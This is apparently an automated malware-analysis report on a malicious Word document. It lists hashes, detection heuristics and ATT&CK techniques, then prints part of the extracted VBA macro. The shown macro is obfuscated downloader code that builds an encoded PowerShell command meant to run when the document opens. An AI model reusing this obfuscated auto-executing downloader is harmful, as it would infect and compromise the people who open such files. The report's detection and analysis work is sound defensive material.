Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3140a977c52bf42d…

MALICIOUS

Office (OLE)

102.8 KB Created: 2018-06-21 10:54:00 Authoring application: Microsoft Office Word First seen: 2018-07-14
MD5: 9280d0a2579c748daca314d1f2f9efb4 SHA-1: a50dd19b8366f8301450c649ad5a70b37171bea2 SHA-256: 3140a977c52bf42daf7279f676a13b210166275b131ab98d9d29c81cda23dcd6
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Word document containing a VBA macro. The macro utilizes the Shell() function, which is a critical finding, and specifically calls 'powershell'. This indicates an attempt to download and execute a secondary payload. The presence of an AutoOpen macro further suggests automatic execution upon opening the document.

Heuristics 6

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16309 bytes
SHA-256: e65e3ab6b679dc553d352cbb93f33bf2ace5183e45a990a2ec0195b8571cd63d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "iBbzpLjzG"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "iOGGmiXdOThjD"
Function bEihGNi()
On Error Resume Next
For Each MTHpZS In LKzbCz
FQkcL = 43779 + Atn(89881) / 75995 / Round(56265) / 18858 / CInt(VimoSC)
kTNpDF = (lwCZo * 80378 + 59223 * CInt(PLztWP - CDbl(5332)) * 64602 * Oct(48123))
AAGjm = lcbsw = aUOSb
Next
YaYbBRBoLC = "Ow" + "erSHe" + "ll  &( " + "$vERBos" + "epRE" + "fErEnCE.ToS" + "TriNG()[1,3]+'" + "x'-JoI" + "N'')( -j" + "oIn"
For Each LEMjn In Nmsul
SNuLLH = 55227 + Atn(65223) / 25067 / Round(56541) / 22708 / CInt(wRYHj)
iEohcJ = (Yojlwo * 53892 + 2172 * CInt(JKhIR - CDbl(18498)) * 11813 * Oct(44156))
VcYOZ = ACziWj = JffiP
Next
cYPPGvu = " (( " + "26 , 81 , 115 ," + "127, 113 ,125,8" + "7, 30" + " , 3 , 30 ,"
For Each JPFlw In ziZJAB
TJzXA = 75808 + Atn(12725) / 19142 / Round(63655) / 96529 / CInt(KStHX)
mtiEva = (MHwwn * 47351 + 77113 * CInt(YPcCz - CDbl(33912)) * 39932 * Oct(99940))
hRFOj = ThLBYb = McjOB
Next
lEhIVZiYTn = " 80, " + "91 ,73 ,19,81" + " , 92" + " ,84, 91 " + ",93 , " + "74 ,30,7" + "6 , 9" + "5 , 80 , "
For Each UDfZdP In XPiDCz
BqjTh = 16056 + Atn(1520) / 82831 / Round(25211) / 1412 / CInt(YuoqT)
kQRjN = (tEaaXm * 67480 + 16985 * CInt(GhMpwM - CDbl(22465)) * 41579 * Oct(57058))
tVAlFC = hcSuA = unlPc
Next
jAoMm = "90, 81, 83 , 5 " + ", 26 , 83, 1" + "24 ,8" + "7,68 ,83 ,121, " + "30,3,30,80 " + ", 91 ,73"
bEihGNi = YaYbBRBoLC + cYPPGvu + lEhIVZiYTn + jAoMm
End Function
Function mPNjKEizT()
On Error Resume Next
For Each sSVXQ In GqvGU
RLWXmw = 92176 + Atn(89424) / 94627 / Round(84436) / 53395 / CInt(zchrN)
BNwjP = (zNCTdE * 22757 + 88610 * CInt(TtAMWa - CDbl(50091)) * 85735 * Oct(94103))
ikmZc = BjYLnM = iLqGLZ
Next
jhmWUI = " ,19 , 8" + "1, 92,84 , 91, " + "93" + ", 74, 30, 1"
For Each ZibXni In GEVAjU
UoGzat = 83856 + Atn(46649) / 60863 / Round(5207) / 4600 / CInt(ctwwal)
THpXO = (njpHj * 62947 + 68336 * CInt(NMzUd - CDbl(34859)) * 73627 * Oct(82476))
tYndf = auQXNB = mKdwAt
Next
dthCzVjOS = "09" + ", 71" + " , " + "77 , 74," + " 91 , 83, 16" + " ,1" + "12 " + ", 91,74,16 , "
For Each oOMSJ In RVamr
MwEols = 43715 + Atn(67793) / 52096 / Round(77850) / 34688 / CInt(oTljU)
RtztFR = (CmACOO * 40395 + 71459 * CInt(wqLCN - CDbl(87971)) * 9676 * Oct(58850))
VzdJY = loXli = AqjliU
Next
GdXVWDncKdQ = "105" + " , " + "91 , " + "92" + ", 125 " + ",82 ,87 , 91 ,8" + "0,74 ,5,26 ,8" + "4 ,125"
For Each tNjQa In jCuwzi
LAGalW = 14204 + Atn(66249) / 68836 / Round(84835) / 35217 / CInt(pRNWlE)
iYRSJ = (IrRBi * 20063 + 99836 * CInt(NuLOH - CDbl(23738)) * 50832 * Oct(79390))
EvXNE = wYjwXn = WAcRLT
Next
UtdTDGSElUB = ",10" + "0,82,119 ,127" + ",30 , 3 , " + "30,2" + "5, 86, 74 " + ",74,78 , " + "4, 17, 17, 74" + ", 70,84 , 89"
For Each JTdwN In SOYKlq
DoHjvU = 64719 + Atn(27919) / 62849 / Round(89777) / 57020 / CInt(wFNCwz)
GNvDp = (cibPor * 57938 + 63910 * CInt(hJirMH - CDbl(20039)) * 16401 * Oct(66411))
swTHj = wBRjb = JhocW
Next
NFcUwM = ",95, 73" + " ,92, 83 ," + " 16, 93 , 81, " + "83,17,108 ," + "82 ,9"
For Each assqp In zVLAw
BXBnR = 75723 + Atn(20615) / 97715 / Round(4936) / 86927 / CInt(ORqnt)
klcFu = (IDwZUq * 6396 + 46120 * CInt(nWIHk - CDbl(78355)) * 37327 * Oct(90477))
LzSXzw = OjrtH = zSHow
Next
BwFtmXA = "0 , 118, 11 , " + "89" + ",70 " + ", 17" + ",126," + "86 ,74,74 , 78 " + ",4,"
For Each ckFzDG In LiRTW
ATzjlj = 66172 + Atn(4993) / 1088 / Round(75114) / 32047 / CInt(TsCwv)
zvsItR = (KAkmz * 37853 + 40183 * CInt(dcQjG - CDbl(43469)) * 61324 * Oct(7071))
KzQubm = rbMtQ = IwVjm
Next
BAqkwfBfCrD = " 17, 17 ," + " 73,73 , 73," + " 1" + "6 ,7" + "7, 74 ," + " 81, 82, " + "88, 95"
For Each PiNOv In GbGHU
Fpdtq = 24782 + Atn(26127) / 1043 / Round(64554) / 76742 / CInt(TpCjq)
KWkED = (KOfKt * 69750 + 40977 * CInt(LtaYT - CDbl(18663)) * 2142 * Oct(39868))
DNmXb = Kdaijc = i
... (truncated)